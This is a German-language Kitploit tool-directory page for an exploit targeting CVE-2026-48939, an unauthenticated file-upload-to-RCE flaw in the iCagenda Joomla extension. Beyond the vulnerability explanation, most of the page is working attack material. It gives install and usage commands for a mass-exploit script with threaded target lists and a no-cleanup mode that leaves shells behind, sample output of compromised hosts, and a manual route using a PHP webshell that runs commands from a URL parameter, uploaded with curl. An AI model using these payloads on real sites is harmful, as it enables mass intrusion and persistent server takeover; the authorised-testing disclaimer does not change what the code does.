Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48939 — Pre-Authentifizierungs-Exploit für beliebigen Datei-Upload (RCE) für die iCagenda Joomla-Erweiterung < 4.0.8 (CVSS 10.0) | Kitploit
Tools/GitHubGitHub/shinthink/cve-2026-48939
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubshinthink/cve-2026-48939

CVE-2026-48939

Pre-Authentifizierungs-Exploit für beliebigen Datei-Upload (RCE) für die iCagenda Joomla-Erweiterung < 4.0.8 (CVSS 10.0)

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-48939 — iCagenda Joomla RCE Exploit

Pre-Auth Beliebiger Datei-Upload → PHP-Code-Ausführung


Übersicht

CVE-2026-48939 ist eine kritische Schwachstelle mit CVSS 10.0 in der iCagenda-Ereigniskalender-Erweiterung für Joomla. Das Dateianhang-Feature des Frontend-Event-Registrierungsformulars setzt Zugriffskontrollen nur auf der Ansichtsebene durch – nicht auf dem Controller – was einen nicht authentifizierten Datei-Upload ohne Erweiterungsvalidierung ermöglicht.

Hochgeladene Dateien landen direkt unter dem Web-Root unter /images/icagenda/frontend/attachments/ und sind sofort als PHP ausführbar.

Betroffene Versionen

iCagenda VersionStatus
3.2.1 – 3.9.14Verwundbar
4.0.0 – 4.0.7Verwundbar
3.9.15 / 4.0.8+Gepatched

Schwachstellenmechanismus

Grundursache

Der registration.submit-Controller verarbeitet Datei-Uploads, ohne die in den Komponenteneinstellungen konfigurierte Zugriffsbeschränkung 'Nur registrierte Benutzer' durchzusetzen. Dateianhänge werden mit ihrer ursprünglichen Erweiterung geschrieben, ohne Zulassungsliste, MIME-Typ- oder Inhaltsvalidierung.

root@kitploit:~
View Layer   → "Registered Only" enforced (attempts to block)
Controller   → No auth check whatsoever (trivially bypassed by POST)
File Handler → No extension allowlist, no MIME check, no content scan
Destination  → Web-accessible directory → PHP executes directly

Angriffsablauf

root@kitploit:~
POST /index.php?option=com_icagenda&task=registration.submit
  jform[attachment] = shell.php  →  saved to /images/icagenda/frontend/attachments/

GET /images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id
  → PHP executed → RCE

Installation

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-48939.git
cd CVE-2026-48939
pip install -r requirements.txt

Verwendung

root@kitploit:~
# Single target
python cve_2026_48939.py -t target.com

# Mass exploit
python cve_2026_48939.py -f targets.txt

# Persistent shell (no cleanup)
python cve_2026_48939.py -t target.com --no-cleanup

# Save results
python cve_2026_48939.py -f targets.txt -o rce.txt

Argumente

root@kitploit:~
  -t, --target      Einzelnes Ziel (Domain oder IP)
  -f, --file        Zielliste, eine pro Zeile
  -o, --output      RCE-Ergebnisse in Datei speichern
  --threads         Gleichzeitige Arbeiter (Standard: 25)
  --no-cleanup      Shells auf dem Ziel belassen
  -v, --verbose     Detaillierte Ausgabe anzeigen

Proof of Concept

Exploitation

root@kitploit:~
$ python cve_2026_48939.py -t target.com -v
root@kitploit:~
  CVE-2026-48939 — iCagenda Joomla RCE Exploit
  CVSS 10.0 | Pre-Auth | File Upload → RCE

    [+] POST registration.submit (jform[attachment]): HTTP 200
    [+] Shell: https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php

  Host     : target.com
  iCagenda : YES v4.0.5
  Vuln     : YES
  RCE      : YES
  Shell    : https://target.com/images/icagenda/frontend/attachments/ic_a3f2b9c1.php
  Output   : uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
  Time     : 3.2s

Mass Exploit Output

root@kitploit:~
  CVE-2026-48939 iCagenda RCE Exploit
  Targets: 500 | Threads: 25 | Cleanup: ON
  -------------------------------------------------------

  [RCE]  target-1.com     v4.0.5    3.2s
         uid=1001(www-data) gid=1001(www-data)
  [RCE]  target-2.com     v3.9.12   4.1s
         uid=33(www-data) gid=33(www-data)

  -------------------------------------------------------
  Total: 500 | iCagenda: 23 | RCE: 8
  -------------------------------------------------------

Manuelle Exploitation

Schritt 1 — PHP-Webshell hochladen

root@kitploit:~
cat > shell.php << 'EOF'
<?php echo "OK|".php_uname(); system($_GET["c"]); ?>
EOF

curl -sk -X POST \
  -F "title=Event" \
  -F "jform[attachment][email protected];type=application/x-php" \
  "https://target.com/index.php?option=com_icagenda&task=registration.submit"

Schritt 2 — Befehle ausführen

root@kitploit:~
curl -sk "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?c=id"

Haftungsausschluss

NUR ZU BILDUNGS- UND AUTORISIERTEN TESTZWECKEN.

Diese Software ist für Sicherheitsexperten gedacht, die autorisierte Penetrationstests durchführen, für Organisationen, die ihre eigene Infrastruktur überprüfen, und für Forscher, die Schwachstellenausnutzung studieren.

Unbefugter Zugriff auf Computersysteme ist illegal und kann gegen Folgendes verstoßen:

  • United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • Indonesia: UU ITE Pasal 30 & 46
  • European Union: Directive 2013/40/EU
  • United Kingdom: Computer Misuse Act 1990

Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen

ResourceLink
IONIX Advisoryionix.io/threat-center/cve-2026-48939
NVD-EintragCVE-2026-48939
iCagenda Changelogicagenda.com/docs

Dieses Projekt ist nicht mit iCagenda oder Joomlic verbunden.

Tool herunterladen